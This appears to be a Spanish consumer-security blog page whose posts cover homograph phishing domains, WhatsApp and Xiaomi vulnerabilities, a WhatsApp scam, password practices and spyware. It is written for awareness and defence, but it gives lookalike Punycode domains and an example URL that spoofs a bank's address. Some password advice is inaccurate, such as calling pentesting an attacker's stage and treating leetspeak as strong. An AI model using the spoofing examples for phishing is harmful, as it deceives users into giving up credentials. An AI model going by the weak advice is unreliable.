En público los grandes bancos se muestran todavía cautelosos, aunque un director de negociación electrónica de una importante entidad estadounidense señaló que los operadores no dudarán en aprovechar la oportunidad de operar criptomonedas, un mercado con una capitalización total de u$s 336.000 millones, si se les presenta la chance.

Para Swanepoel, el mundo lentamente se está moviendo hacia un nuevo sistema monetario. Cree que su firma pronto competirá con los bancos más grandes mientras los cimientos del sistema financiero sufren un cambio radical.

«El Santo Grial de Internet es poder mover valor peer-to-peer de manera segura y ahora podemos hacer eso con la tecnología blockchain,» señaló. «Simplemente no sabemos aún si será dinero o bitcoin, o alguna otra cosa, lo que deberíamos mover».

Mercer concuerda. «Hoy la manera más eficiente para trasladar dinero a Australia es subir a un avión y volar con un portafolio», señaló. «Eso claramente no va a durar si creemos en la tecnología blockchain».

Ataques homográficos: Qué son y como evitarlos

Categoría: Certificado Seguridad

A menudo se recomienda verificar que un sitio use HTTPS y tenga un certificado de seguridad para identificar si es un engaño. Pero, ¿qué pasa cuando los cibercriminales registran dominios que se escriben muy parecido a los originales y obtienen certificados completamente válidos para sus sitios?

De la misma forma que los atacantes encuentran métodos cada vez más sofisticados para intentar evadir las técnicas de detección del antivirus, también mejoran aquellas que les permiten engañar al usuario o al menos evadir los consejos básicos que se suelen enseñar en una clásica capacitación de seguridad informática.

A pesar de ello, siempre podemos dar un paso más para reforzar nuestra seguridad y detectar sus engaños, como veremos más abajo.

Primero apuntaron a mejorar notablemente el diseño de los engaños de phishing, utilizando imágenes elaboradas o la inclusión de iframes provenientes de una página auténtica.

Además, gracias a las ventajas que hoy en día proporcionan los diccionarios y traductores en línea, logran evitar (algunos) errores de gramática u ortografía en los correos.

Por otro lado, ya no basta con mirar la dirección del remitente de un correo electrónico o SMS, ya que gracias a las técnicas de spoofing un atacante se puede hacer pasar por una entidad distinta, falsificando los datos en una comunicación.

También es necesario prestar especial atención a los enlaces a los cuales conducen los correos engañosos, ya que muchas veces los sitios fraudulentos se ocultan detrás de direcciones acortadas o compuestas, para no revelar a simple vista su intención.

Aún así, nos quedaba un consejo que, hasta ahora, creíamos infalible: revisar que la página sea segura, que utilice el protocolo HTTPS y, sobre todo, que tenga el certificado de seguridad.

Cibercriminales con sitios seguros

Si bien es cierto que la mayoría de las páginas fraudulentas utilizan HTTP, mientras que los sitios originales que solicitan credenciales (como redes sociales, portales bancarios, etc.) lo hacen a través de HTTPS, esto no significa que un atacante no pueda hacer lo mismo. De hecho, podría fácilmente convertirlo en HTTPS, obteniendo un certificado SSL/TLS completamente válido para su sitio, incluso de manera gratuita.

Ahora bien, para que esto funcione, el atacante debería ser capaz de registrar un dominio que se vea lo más parecido posible al sitio que desea falsificar y luego adquirir el certificado para este nuevo dominio. Una opción es buscar dominios que se escriban similar. Por ejemplo: “twiitter.com” versus el original “twitter.com”, o “rnercadolibre.com” versus el original “mercadolibre.com”.

¿Recuerdas esos experimentos en los que te muestran palabras incompletas o con errores casi imperceptibles, y las lees rápido como si estuviesen completas y bien escritas? Bueno, lo mismo le sucede a muchos con las URL al navegar.

A simple vista y leyendo con rapidez, esos ejemplos podrían engañar a más de uno, pero basta con prestar atención a cómo está escrita la dirección para detectar el engaño. Lo que aún necesita el atacante es poder registrar un sitio que se escriba diferente, pero se vea igual para el usuario, y para esto es que se utilizan los ataques homográficos.

Veamos un ejemplo. ¿Puedes decir si este sitio es falso?

Este ejemplo pertenece a una prueba de concepto realizada por el investigador Xudong Zheng, quien registró el dominio https://www.xn--80ak6aa92e.com/. Puedes ver cómo funciona ingresando al enlace a través del navegador Firefox.

Lo que hace esto posible es la utilización de caracteres Unicode en otros idiomas, como cirílico, griego o ruso. En estos idiomas podemos encontrar caracteres similares o, muchas veces, iguales a los que utilizamos habitualmente en el latín y en las URLs. Gracias a Punycode, que es una sintaxis de codificación que permite que cualquier carácter Unicode pueda ser traducido en una cadena de caracteres más limitada y compatible con las URLs, es que se puede registrar un nombre de dominio utilizando estos caracteres.

Por ejemplo, se puede registrar un dominio como “xn--pple-43d.com”, que es interpretado por el navegador como “apple.com”, pero en realidad está escrito utilizando el caracter cirílico “а” (U+0430) en vez de la “a” en ASCII (U+0041). Si bien ambos caracteres se ven iguales a simple vista, para los navegadores y certificados se seguridad se trata de dos caracteres diferentes y, por lo tanto, forman parte de dominios diferentes.

Existen numerosos ejemplos, como “tωitter.com” (xn--titter-i2e.com en Punycode) o “gmạil.com” (xn--gmil-6q5a.com). Incluso, puedes jugar a crear tus propias combinaciones con un conversor de Unicode a Punycode.

Muchos navegadores actuales tienen mecanismos que intentan evitar este tipo de ataques. Por ejemplo, en Firefox o Chrome, cuando un dominio contiene caracteres en diferentes idiomas, en lugar de mostrar su forma Unicode, mostrará el Punycode correspondiente.

Es decir, en los ejemplos anteriores, en vez de ver “apple.com” (forma Unicode), veríamos “xn--pple-43d.com” (forma Punycode); y en el caso de tωitter.com” sería “xn--titter-i2e.com”.

Sin embargo, en la prueba de concepto, Xudong Zheng logra evitar esta protección registrando el dominio “apple.com” utilizando únicamente caracteres en lenguaje cirílico. De esta forma, “xn--80ak6aa92e.com” se verá como: аррӏе.com.

Además, el investigador va un paso más allá obteniendo a través de Amazon un certificado TLS para su dominio, el cual a simple vista se ve bastante convincente:

Pero si entramos a ver los detalles podemos observar que en realidad pertenece a “xn--80ak6aa92e.com”:

Si bien esta vulnerabilidad ya ha sido corregida en las últimas versiones de Chrome e Internet Explorer, navegadores como Firefox aún sufren este problema. En este último navegador, una alternativa es configurar la opción network.IDN_show_punycode en true, de forma tal que siempre muestre los caracteres en su forma Punycode.

Aun así, el sitio gmạil.com del ejemplo anterior también logra evitar la protección de Chrome, debido a que utiliza únicamente caracteres del latín, inclusive caracteres especiales como “ạ”, los cuales sí son mostrados por el navegador.

La necesidad de reforzar la protección

Cada vez que encontramos un nuevo caso de phishing o alguna página fraudulenta que busca engañar al usuario, repetimos los mismos consejos: revisar el remitente del mensaje, prestar atención al enlace de la página a la que estamos ingresando, asegurarnos que esté bien escrita y, por sobre todas las cosas, que sea segura (utilice HTTPS) y tenga certificado de seguridad.

Sin embargo, hoy en día no alcanza con solo estos cuidados, ya que los cibercriminales emplean técnicas cada vez más complejas para engañar al usuario. Implementar HTTPS y certificados no es un tema de seguridad para el atacante; después de todo, si está robando tus credenciales, ¿qué importa si las recibe cifradas o no?

El punto es que estas técnicas se usan para dar a los usuarios una falsa sensación de seguridad que los lleve a ingresar sus datos creyendo que están en un sitio seguro, y obedeciendo al consejo que les repitieron hasta el hartazgo de que miren si el sitio tiene un candadito y HTTPS. Pero, como vemos, ya no es suficiente.

Es por esto que además de prestar especial atención a los correos y sitios web, también te recomendamos mirar cuidadosamente los certificados de seguridad, evitar acceder a los sitios a través de enlaces en correos electrónicos (mejor hacerlo siempre escribiendo la URL o a través de accesos directos de confianza) y agregar una capa extra de protección en tus cuentas utilizando el doble factor de autenticación.

Por qué no repetir contraseñas

Categoría: Redes Sociales Seguridad

Vivimos inmersos en redes sociales, accedemos a sistemas webs cotidianamente, desactivamos y activamos la alarma diariamente y realizamos muchisimas acciones mas que involucran contraseñas.

Pero entendemos como funcionan? Por qué nos dicen que no hay que repetirlas? Nadie me vá a mirar a mí. La vengo usando por años y jamás me pasó nada. Estas y varias preguntas y afirmaciones más, nos hacen creer de que elegimos las correctas y que son seguras.

Lo anterior dista mucho de la realidad. Hoy se necesita un manejador de contraseñas como (KeyPass o algún otro) para almacenar cientos de contraseñas que usamos diariamente.

Como se graban esas contraseñas en los sevidores y como se chequean es una tarea que como usuario final no podemos controlar, pero lo que generalmente hacen los sistemas es aplicarle una función (sha-1, bcrypt, etc) al valor introducido en la contraseña y éste se almacena junto a nuestra información personal en una base de datos. A este valor se le llama «hash»

Más allá de que la contraseña sea ilegible para cualquiera que pueda acceder a la base de datos, cuando suceden eventos de robo de información de los distintos servidores los diferentes «hashes» junto con la información son almacenados por millones en servidores que después se usan como consulta.

Pero porqué necesito cambiarla si la contraseña es ilegible? Por el simple motivo de que cuando un hash es descubierto y tus datos revelados se ingresa en una segunda etapa, que se conoce generalmente como «pentesting», también se usa ingenieria social, para poder averiguar la mayoria de las redes sociales que se usan y/o demás

Una vez que una vulnerabilidad es explotada, nuestra información es expuesta a internet. Existen grandes bases de datos con información real de millones de personas que se venden en la deep web (internet profunda).

Es por eso que le aconsejamos que por cada sistema que use no repita contraseñas. También le aconsejamos que no vuelva a utilizar las contraseñas anteriores. Ustéd se preguntará, cómo podría recordar tantas contraseñas y si además las debo cambiar cada 180 días por ejemplo. Para eso se crearon los manejadores de contraseñas, en donde uno almacena bajo una contraseña segura todas las que usamos en los distintos sistemas.

Hay varios manejadores de contraseñas que se pueden usar, algunos tienen mas pros que cons que otros, pero si necesita alguna información sobre algunos no dude en escribir un comentario debajo y con gusto le responderé a la brevedad.

Reflexión sobre Sharenting

Categoría: Redes Sociales Seguridad

El sharenting es un anglicismo utilizado para describir la práctica de publicar en las redes sociales fotos y contenido de niños, principalmente por parte de los padres. En el ámbito digital es un fenómeno que puede considerarse relativamente nuevo y que representa un cambio cultural en la forma en que los más chicos crecen. Se trata de una acción que, en general, está acompañada de insuficiente reflexión previa, al igual que muchas otras acciones que realizamos a medida que nos apropiamos de las tecnologías de la comunicación vigentes.

¿Cómo reflexionar acerca de algo cuyo alcance desconocemos? 

Sí, a ciencia cierta, lo desconocemos aún; pero tratándose de personas menores de edad, de la privacidad de nuestros niños y niñas, tenemos la responsabilidad de detenernos a pensar antes de postear, para seguir cuidándolos tal como lo hacemos en los otros ámbitos de sus vidas.  Es por eso que el presente artículo recoge ciertas inquietudes relacionadas al sharenting que considero no podemos pasar por alto, como así tampoco a los consejos para preservar a los niños de las consecuencias indeseadas de la exposición pública (algunas, lamentablemente, peligrosas).

Del sharenting analógico al digital

A nuestras madres les encanta siempre alguna foto nuestra, de niño, que seguramente estará en algún lado visible de nuestra casa, a la vista de todos.  Seguramente le trae lindos recuerdos del momento. No hay otra razón, porque algunas fotos pueden no gustarnos, se lo habremos dicho varias veces, pero la respuesta, que nos consuela un poco, es “no la ve nadie más que nosotros”. Tiene razón en ese punto. El sharenting analógico tiene su lado inofensivo.

Muchos hemos crecido en una época previa al auge de las redes sociales. No sé si nuestros padres hubieran compartido fotos de nosotros, pequeños, en Internet. Me resulta imposible saber si algún portarretratos no hubiera tenido el marco de Facebook, Instagram o cualquier otra red social. Sospecho que la ternura y la felicidad que nos provocaron en tantas oportunidades, hubiera querido compartirla con la mayoría de mis contactos.  Sin embargo, leyendo el artículo de Javier Lombardi me asaltó la reflexión.  ¿Qué margen nos hubieran dejado a nosotros, hoy adultos, para que eligieramos qué parte de nuestras vidas querríamos mantener en la intimidad?  ¿Qué tan libres seriamos de presentarnos ante el mundo a nuestra manera, tal como lo hicieron nuestros padres?  Una vez más, imposible saberlo.

Se dice que una imagen reemplaza a muchas palabras, pero ese no es el punto en el que me quiero detener, sino en la importancia que tiene comprender que estamos en la era de la imagen, de la espectacularización de nuestras vidas a través de medios audiovisuales.  Por eso, no es de extrañar que los bebés ya tengan presencia digital desde que están en la panza.  Quizá, construir la biografía online de nuestros hijos e hijas también sea una moda pasajera.  Imposible saberlo hoy.

Los ejemplos que uno puede encontrar sobre el sharenting de la época de nuestros abuelos y de nuestros padres me parecen pertinentes para quitarle todo el peso de la culpa a Internet.  Es que el ser humano siempre hace uso de las tecnologías disponibles para dejar huellas, desde las mismísimas rocas que analizamos para poder conocer la historia de la humanidad.

Sin embargo, la cosa es distinta en los tiempos que corren. Internet imprime perpetuidad a los portarretratos y a algunas partes de su superficie las vuelve punzantes, de tal forma que si las tocamos, a veces nos podemos lastimar.  Si bien es inocente pensar que desaparecerá para siempre algo que publicamos en cualquier medio de comunicación, la realidad indica que se necesitan ciertos conocimientos, que no se adquieren de manera espontánea, para moverse de manera segura y responsable en el mundo digital.  Es bien intuitivo el uso, no así sus consecuencias, y los adultos vamos aprendiendo por ensayo y error.

Suena complicado enseñar a desarrollar hábitos digitales saludables, cuando ni siquiera los imaginamos.  No hay recetas para ser padres y madres, “se hace camino al andar” (como dice la canción).  Y menos para terrenos poco explorados.  No obstante, el artículo de Javier Lombardi sobre los perfiles “promo” en Instagram y cómo éstos pueden afectar la reputación de los jóvenes, nos invita a reflexionar sobre el alcance del sharenting en la actualidad, y a anticipar el efecto que compartir determinada información de nuestros hijos e hijas puede llegar a tener en sus vidas.

En varios pasajes de este artículo hice referencia a “imposible saberlo”.  Creo que alrededor del sharenting habría que usar “imposible no suponerlo”.

Vulnerabilidad Crítica en Whatsapp

Categoría: Android iOS Seguridad Whatsapp

Vulnerabilidad en WhatsApp permite instalar spyware en teléfonos con solo realizar una llamada

El fallo, que afecta tanto a usuarios de Android como de iOS, ya fue reparado en la última actualización que lanzó WhatsApp

WhatsApp reveló la existencia de una vulnerabilidad crítica en la aplicación que permite instalar el conocido spyware Pegasus en dispositivos Android e iOS con solo realizar una llamada al número de teléfono que se busca comprometer. La vulnerabilidad ya fue reparada y la compañía lanzó un parche con la última actualización.

De acuerdo a la información revelada el lunes, Facebook, propietario de WhatsApp, anunció oficialmente la existencia de una vulnerabilidad (CVE-2019-3568) de buffer overflow (o desbordamiento de búfer) en WhatsApp VOIP que permiten la ejecución remota de código en el dispositivo de la víctima cuando se logra enviarle al número de teléfono elegido como blanco de ataque paquetes de SRTP especialmente diseñados. En este sentido, para explotar el fallo el atacante solo necesita llamar a un dispositivo vulnerable. Además, la víctima ni siquiera necesita aceptar la llamada para que su equipo sea comprometido e incluso la llamada desaparece del registro, explicó Financial Times.

Según explicaron algunos medios, la compañía sospecha que un bajo número de usuarios fue blanco de este ataque que busca instalar el spyware. Probablemente operado por actores con conocimientos avanzados dado que no se trata de una acción trivial.

Asimismo, luego de ser descubierto el fallo, en un período menor a los diez días la compañía desarrolló un parche que lanzó el pasado viernes con la última actualización. Por lo tanto, aquellos usuarios que cuenten con la última versión de la app no podrán ser víctimas de este exploit.

Son vulnerables a este fallo:

Las versiones para Android anteriores a la 2.19.134 y para iOS anteriores a la 2.19.51; las versiones de WhatsApp Business para Android anteriores a la 2.19.44 y de Business para iOS anteriores a la 2.19.51; así como las versiones para Windows Phone anteriores a la 2.18.348 y de WhatsApp para Tizen anteriores a la 2.18.15.

Acerca del spyware Pegasus

Pegasus fue desarrollado por el grupo israelí NSO como herramienta para uso gubernamental para la investigación contra el crimen y lucha contra el terrorismo. En este sentido, Pegasus permite acceder a una gran cantidad de información del dispositivo en el cual se encuentra instalado, como mensajes de texto, correo, mensajes de WhatsApp, información de los contactos, registro de llamadas, acceso al micrófono y a la cámara; todo esto sin que la víctima se dé cuenta.

Este spyware ocupó los titulares de varios medios internacionales en 2017 cuando el New York Times diera a conocer un estudio realizado por el laboratorio Citizen Lab ubicado en la Universidad de Toronto, que aseguraba que la aplicación espía fue utilizada desde el 2011 para fines para los cuales no fue diseñada. Asimismo, el año pasado en un nuevo informe divulgado por Citizen Lab se supo que los dispositivos infectados con Pegasus estaban presentes en 45 países siendo operados por 36 actores.

Por lo tanto, recomendamos a los usuarios que revisen si cuentan con la última actualización instalada y en caso de no ser así, que actualicen la app con la última versión.

«Hot Sale»: Cosas a tener en cuenta en cuanto a seguridad informática

Categoría: Hot Sale Información Seguridad

La facilidad para realizar compras online se ha incrementado notablemente en los últimos años, como así también las precauciones que uno debe tener en cuenta a la hora de realizar dichas compras.

«Hot Sale» es un evento en donde las empresas ofrecen grandes descuentos en una gran variedad de productos y servicios que ofrecen estas.

Le recomendamos que para tener una experiencia satisfactoria en este evento tenga en cuenta los siguientes consejos en cuanto a seguridad informática:

  • Verifique que la página a la cual accede tenga conexión segura (https) y que sea una tienda oficial del evento mencionado (
    https://www.hotsale.com.ar/ )
  • Solo introduzca los datos de su tarjeta de crédito/débito en las pasarelas de pago que siempre tienen que estar bajo una conexión segura (https) de estas tiendas oficiales. Evite introducir sus datos en lugares sospechosos.
  • Si el proceso tarda mientras está realizando el pago no refresque la página para que cargue más rápido (puede ocasionar multiples compras).
  • Si ingresa a alguna promoción mediante algun link que le hayan enviado via sms, whatsapp, email, etc verifique que la dirección sea la correcta y que sea conexión segura (https).
  • En caso de algún inconveniente en la compra, comunicarse directamente con la empresa en cuestión para que los ayude a resolverlo.
  • Si realiza las compras vía telefónica solo de sus datos personales si el teléfono aparece en la página oficial de la empresa.

Cualquier otra duda que tenga o alguna consulta en cuanto a «Hot Sale» o ciberseguridad, no deje de consultarme y a la brevedad le responderé.

Los parches de Microsoft están congelando las PC más antiguas que ejecutan Sophos, Avast

Categoría: Blog

Las computadoras que ejecutan el software de Sophos o Avast no han podido iniciarse luego de la última actualización de Patch Tuesday. Los últimos parches de seguridad de Microsoft están causando que las máquinas más antiguas que ejecutan el software Sophos o Avast se bloqueen o no se inicien por completo después de que se aplican, informan ambas compañías. El problema afecta a las PC con Windows 7, 8.1, Server 2008, Server 2008 R2, Server 2012 y Server 2012 R2 con «cualquier terminal o producto de servidor de Sophos Windows», excepto Sophos Central Intercept X. Afecta a Intercept X Advanced e Intercept X Advanced con EDR. Las PC no se inician cuando se aplican las actualizaciones mensuales más recientes y solo de seguridad y se reinicia la computadora. «Microsoft y Sophos han identificado un problema en los dispositivos con Sophos Endpoint Protection instalado y administrado por Sophos Central o Sophos Enterprise Console (SEC) que puede causar que el sistema se bloquee o se cuelgue al reiniciar después de instalar esta actualización», informa Microsoft. Por ahora, Microsoft ha bloqueado temporalmente que los dispositivos no reciban la actualización si Sophos Endpoint está instalado hasta que haya una solución disponible. Sophos insta a los usuarios a no realizar la actualización; se recomienda a los que lo hayan hecho y no lo hayan reiniciado que eviten hacerlo hasta que se elimine la actualización.

Avast dice que las máquinas con Windows, en particular las que ejecutan Windows 7, se están bloqueando o congelando durante el inicio cuando se aplican ciertas actualizaciones de seguridad. Los clientes han reportado problemas con las PC que usan Avast for Business y Avast CloudCare en Windows. Algunos no pueden iniciar sesión; algunos pueden iniciar sesión después de «un período de tiempo muy prolongado», advierte Avast a los usuarios. Vale la pena señalar que Microsoft no ha comentado públicamente el problema de Avast ni ha bloqueado las actualizaciones para PC. Lea el aviso de Sophos aquí y el asesoramiento de Avast aquí para obtener más información.

Fuente:
https://www.darkreading.com/risk/microsoft-patches-are-freezing-older-pcs-running-sophos-avast/d/d-id/1334403?_mc=rss_x_drr_edt_aud_dr_x_x-rss-simple

https://community.sophos.com/kb/en-us/133945

https://kb.support.business.avast.com/GetPublicArticle?title=Windows-machines-running-Avast-for-Business-and-Cloud-Care-Freezing-on-Start-up

Vulnerabilidad en el navegador por defecto de Xiaomi

Etiquetas:

Categoría: Android Seguridad

Se ha descubierto una vulnerabilidad en el navegador predeterminado de los dispositivos Android de Xiaomi que permite realizar ataques despoofing.

Una vulnerabilidad en el navegador predeterminado que incorpora la versión Android de los dispositivos Xiaomi permite realizar ataques de spoofing a las URLs visitadas a través del mismo, gracias a un fallo en la barra de navegación. 

Una vulnerabilidad de spoofing en la barra de navegación permite al atacante hacer creer al usuario que se encuentra en una página web que en realidad no es en la que está navegando. Esto que permite realizar, por ejemplo, ataques de phishing mucho más creíbles, pues no solo se copia el aspecto de la web, sino que utilizando la vulnerabilidad de spoofing el atacante puede engañar al usuario haciéndole creer que está visitando una URL legítima. 

De acuerdo a la información que se ha hecho pública, la vulnerabilidad se debe a que el navegador no procesa correctamente el parámetro q de las URLs, fallando al mostrar la parte de la URL que va delante de ?q=

De modo que, si la victima visita la URL de ejemplo: https://atacante.com/?q=www.bancolegitimo.com, la barra del navegador mostrará únicamentewww.bancolegitimo.com

Como sabemos, en los navegadores de dispositivos móviles, la barra de navegación es el elemento más fiable (y habitualmente el único) para comprobar de forma rápida si estamos navegando en el sitio legítimo o no, por lo que esta vulnerabilidad se convierte en un problema de seguridad realmente grave. 

Las versiones afectadas son: Xiaomi Mi browser 10.5.6-g (MIUI native browser) y Mint Browser 1.5.3. Ambas versiones son las últimas versiones disponibles en el momento en el que se escribe esta noticia.  Una aclaración importante es que solo se dá en celulares internacionales y no los distribuídos en China.

Más información:
Fuente: TheHackerNews
CVE: CVE-2019-10875
Twitter: Arif Khan

El antivirus preinstalado de Xiaomi y su vulnerabilidad

Etiquetas:

Categoría: Android Seguridad

Los celulares de Xiaomi no paran de crecer en ventas en todo el mundo gracias a su reducido precio. Sin embargo, lo que más echa atrás a la gente a la hora de comprar un celular de la compañía es MIUI, su capa de personalización sobre Android que, entre otras cosas, muestra publicidad a los usuarios. Ahora, una de las apps que viene preinstaladas en los móviles de Xiaomi cuenta con una grave vulnerabilidad.

Guard Provider, el antivirus de Xiaomi que cuenta con una grave vulnerabilidad

Esta vulnerabilidad ha sido descubierta por investigadores de Check Point, y, curiosamente, afecta a la aplicación Guard Provider (llamada Security, o Seguridad). Esta app, es la que se debe encargar de la seguridad del celular, protegiéndolo ante posibles ataques de malware. Sin embargo, en su código hay un fallo que permite realizar ataques de man-in-the-middle e inyectar código malicioso.

El principal problema está en que esa aplicación tiene acceso a Internet y lo usa para enviar y recibir información, la cual no se hace a través de HTTPS, por lo que los datos van en texto plano sin cifrar. Eso hace que un atacante que esté conectado a la misma red WiFi que nosotros pueda llevar a cabo un ataque man-in-the-middle e inyectar código malicioso en el dispositivo para robar contraseñas, instalar ransomware, robo de datos o introducir básicamente cualquier tipo de malware.

Un SDK de terceros, principal culpable de la vulnerabilidad

La culpa de esta vulnerabilidad la tiene un kit de desarrollo (SDK) de terceros utilizado en la app. Ese es el problema que pasa al utilizar librerías de terceros, ya que éstas pueden contener vulnerabilidades desconocidas incluso por los propios desarrolladores. De media, una aplicación cuenta en la actualidad con 18 SDK, y una vulnerabilidad en una de ellas pone en peligro a todas las demás, ya quecomparten permisos y contexto dentro de una unidad de ejecución en el sistema operativo.

Este uso excesivo de SDK puede ser positivo para los desarrolladores, que no tienen que preocuparse en desarrollar y testear algunas partes de la app, pero también puede generar inestabilidad, dando lugar a cuelgues, a que se inyecte malware, a que el dispositivo se vuelva lento, o a un consumo excesivo de batería en Android.

Nada más al descubrirla y documentarla, los investigadores comunicaron la vulnerabilidad a Xiaomi, que rápidamente se apresuraron a parchearla mediante el lanzamiento de una nueva versión. Esta aplicación viene preinstalada en todos los celulares de Xiaomi, que tiene un 8% de cuota en todo el mundo, por lo que hay millones de usuarios afectados. Por ello, es recomendable que se actualicen los celulares cuanto antes. Si tienes el celular rooteado, también puedes desinstalar la aplicación del celular.

Xiaomi ha comunicado que es consciente del fallo y que ya ha trabajado con Avast para solucionarlo. Al momento de la nota no podemos comprobar de que el patch este para descargar, pero le recomiendo ampliamente mantener siempre las aplicaciones actualizadas

Para contraseñas usá PassPhrases

Etiquetas:

Categoría: Información Seguridad

Las contraseñas son el último paso para que nuestra seguridad se vea vulnerada. Ya que actualmente las usamos para un sinfín de configuraciones, desde un simple email, hasta nuestra cuenta bancaria. Pero los tiempos cambian y también los recursos para descifrar una contraseña. Es por eso que a medida que el nivel de cómputos de los ordenadores se fue incrementando las contraseñas requerían mas caracteres, números, símbolos, etc.

Se estima que en los próximos años las contraseñas de muchos caracteres se van a poder descifrar en minutos. Es por eso que los Administradores de Seguridad Informática están recomendando pasar a usar frases como contraseñas. Estas frases no deberían ser conocidas y en lugar de vocales deberían usar números; si le agregaramos algún símbolo especial estariamos ante una constraseña que tardarían muchisimos años en poder descifrarla.

Ejemplo, si nuestra contraseña para el email fuera «f5R$iu8a» nosotros podríamos pensar que es segura y que nadie la pueda adivinar, pero en 12 días esta contraseña puede ser adivinada. Si quieres verificar el nivel de tu contraseña lo puede hacer aquí (recomiendo no poner la contraseña real sino una parecida modificando letras y números). Si tenemos en cuenta que los GPUs van incrementando su velocidad a niveles cada vez mayores es claramente una señal de que debemos incrementar la cantidad de caracteres.

Es por todo lo anterior de que las frases es nuestra mejor alternativa a la hora de generar una contraseña confiable. Debemos recordar de no usar frases conocidas de películas, letras de canciones, nombres de mascotas, etc. y usar frases aleatorias pero que sean fácil de memorizar. A continuación algunos ejemplos que no se deben usar y algunos que si se pueden usar (no utilice los ejemplos dados a continuación en la vida real).

Contraseñas que no deberías usar

  • «mi perro se llama firulai»
  • «mi apellido es lopez»
  • «hoy hace calor»
  • «estrella fugaz»

Contraseñas que son robustas y que deberías usar

  • 4lgun0s P33rr0s lluv1a?
  • S3nt1m13nt0s 4zul3s 28!
  • P3rfum3 4m4r1ll0 3ur0p4

Si tiene alguna duda o consulta no deje de escribirme. Toda opinión es válida y trataré de ayudarle de la mejor manera posible

El engaño del cambio de color del WhatsApp

Categoría: Android Seguridad Whatsapp

Está circulando un engaño para cambiar los colores de WhatsApp. Si los usuarios instalan la extensión para el cambio de colores, automáticamente enviarán un mensaje con la invitación toda su lista de chats activos

En estos días se han detectado varios casos sobre un mensaje que llega a través de WhatsApp invitando a cortar con la monotonía del verde tradicional de la aplicación y acceder a nuevos colores con tal solo hacer un clic. Esto es meramente un engaño.

Como ya es usual en este tipo de campañas, el link reacciona de manera diferente si se hace clic desde un teléfono celular o desde la aplicación WhatsApp web.

En el caso de acceder desde una computadora a través de WhatsApp web, se invita al usuario a instalar una extensión de Google Chrome, llamada Black Theme for Whatsapp, que permitirá cambiar la aplicación a un color más oscuro. Se observó también que el mensaje aparece en portugués, a diferencia del mensaje original en español, lo que puede ser una señal de que la campaña originalmente buscaba victimas en Brasil y solo se preocuparon por traducir algunos mensajes claves.

Esta extensión la podemos encontrar dentro del Chrome Web Store y presenta un número importante de descargas; lo cual nos da una idea de la magnitud de la campaña.

En el caso de que un usuario desprevenido instale la extensión y abra su sesión de WhatsApp web, automáticamente enviará un mensaje a toda su lista de chats activos invitando a cambiar los colores de la aplicación.

Dentro del complemento se encuentran mensajes en diferentes idiomas (1) para enviar, además de los diferentes componentes que integran el mensaje (2, 3 y 4) incluyendo la imagen (5), también para diferentes idiomas.

También son diferentes URLs (6) que pueden estar asociadas con el mensaje que se va construyendo de manera aleatoria (7) a medida que se envían los mensajes.

Inclusive si el usuario se percata de lo que está ocurriendo y cierra la ventana del navegador web, la acción no se detiene, ya que es el propio teléfono el que envía los mensajes.

Esta funcionalidad en particular demuestra las estrategias utilizadas por los atacantes para propagar de manera rápida y efectiva este tipo de campañas y así lograr un mayor alcance. Además, es la respuesta para muchos usuarios cuando nos preguntan como es posible que este mensaje llegue a todos sus contactos cuando nunca compartieron el mensaje de manera consciente.

Por otro lado, si se accede al enlace de manera convencional desde el celular, aparece un mensaje pidiéndole al usuario que comparta la aplicación con 30 amigos o 10 grupos antes de llegar a la posibilidad del tan prometido cambio de colores.

Igualmente, aunque no se comparta con los contactos y quisiéramos seguir adelante, la aplicación empieza a mostrar su verdadero fin y de manera simultanea solicita descargar una APK llamada best_video.apk y activar notificaciones desde un servidor ubicado en Rusia.

Si la potencial victima deja que ocurra toto lo anterior, el teléfono celular quedará infectado con una variante conocida como Android/Hiddad, una familia de troyanos que se había identificado propagando adware entre usuarios de Android.

Vale la pena resaltar que esta aplicación se instala en el dispositivo pero no deja ninguna evidencia de su instalación, ya que se oculta el icono y solamente se activa cuando el usuario empieza a navegar, mostrando banners publicitarios al usuario asociados a diferentes servicios legítimos de publicidad; pero para el usuario no es evidente que se están utilizando sus recursos para este tipo de acciones.

A la hora de cuidarse de este tipo de amenazas que utilizan estrategias de ingeniería social, que buscan tentar al usuario para que acceda a un enlace con una promesa atractiva de por medio, como es en este caso personalizar su WhatsApp, lo que siempre se debe recordar es la premisa de nunca acceder a enlaces que nos llegan por cualquier medio digital, inclusive cuando nos llegue a través de un contacto conocido. En estos casos lo primero que debemos hacer es verificar la veracidad del mismo, es decir, preguntarle a la persona que nos envía la invitación ─en este caso del cambio de colores de WhatsApp─ si efectivamente es algo que nos mandó conscientemente o si fue por haber sido víctima del engaño y está ayudando sin intención a su propagación.

Adicionalmente, contar con una solución de seguridad instalada en el teléfono que haga sonar las alarmas ante la presencia de enlaces o descargas de contenidos potencialmente maliciosos.

¿Qué es el spyware? Cómo funciona y cómo prevenirlo.

Categoría: Seguridad

Spyware es usado por todos, desde estados nacionales hasta esposos celosos, para recopilar información a escondidas y monitorear la actividad de las personas sin su conocimiento. Esto es lo que necesita saber sobre esta forma generalizada y espeluznante de malware.

Definición de spyware
Spyware es una amplia categoría de malware diseñado para observar de forma secreta la actividad en un dispositivo y enviar esas observaciones a un snooper (fisgón). Esos datos se pueden usar para rastrear su actividad en línea y esa información se puede vender. El spyware también se puede usar para robar información personal, como contraseñas de cuentas y números de tarjetas de crédito, lo que puede resultar en robo de identidad y fraude.

«El software espía es realmente todo lo que recopila, y posiblemente disemina, información sobre el usuario sin el consentimiento del consumidor», explica Josh Zelonis, analista senior de la empresa de investigación de mercado Forrester Research. «El software espía es y siempre será un método popular para recopilar información privada. Lo vemos en troyanos bancarios, redes publicitarias, esposos celosos y compañías que cruzan los límites éticos mediante la instalación de registradores de teclas como parte de sus programas de amenazas internas. Es increíblemente amplio. Problema que impacta a todos potencialmente «.

El uso del malware parece estar en aumento. Según un informe reciente del fabricante de software de seguridad Malwarebytes, las detecciones de software espía para consumidores aumentaron un 27 por ciento de 2017 a 2018. Las detecciones de negocios aumentaron aún más: 142 por ciento durante el mismo período.

«Es parte de una tendencia a las amenazas tradicionales», dice Jerome Segura, jefe de inteligencia de amenazas de Malwarebytes. «Esto demuestra que los delincuentes están interesados ​​en robar datos a los usuarios», agrega. «Una vez que tienen los datos, pueden implementar malware adicional en el sistema y crear un vector adicional para la monetización».

Tipos de spyware

Spyware puede tomar varias formas. Incluyen:

  • Adware: observa su actividad en línea y muestra anuncios que cree que le interesarán según esa información. Aunque es benigno en comparación con otras formas de software espía, el software publicitario puede tener un impacto en el rendimiento de un dispositivo, además de ser molesto.
  • Cookies de seguimiento: son similares al adware, aunque tienden a ser menos intrusivas.
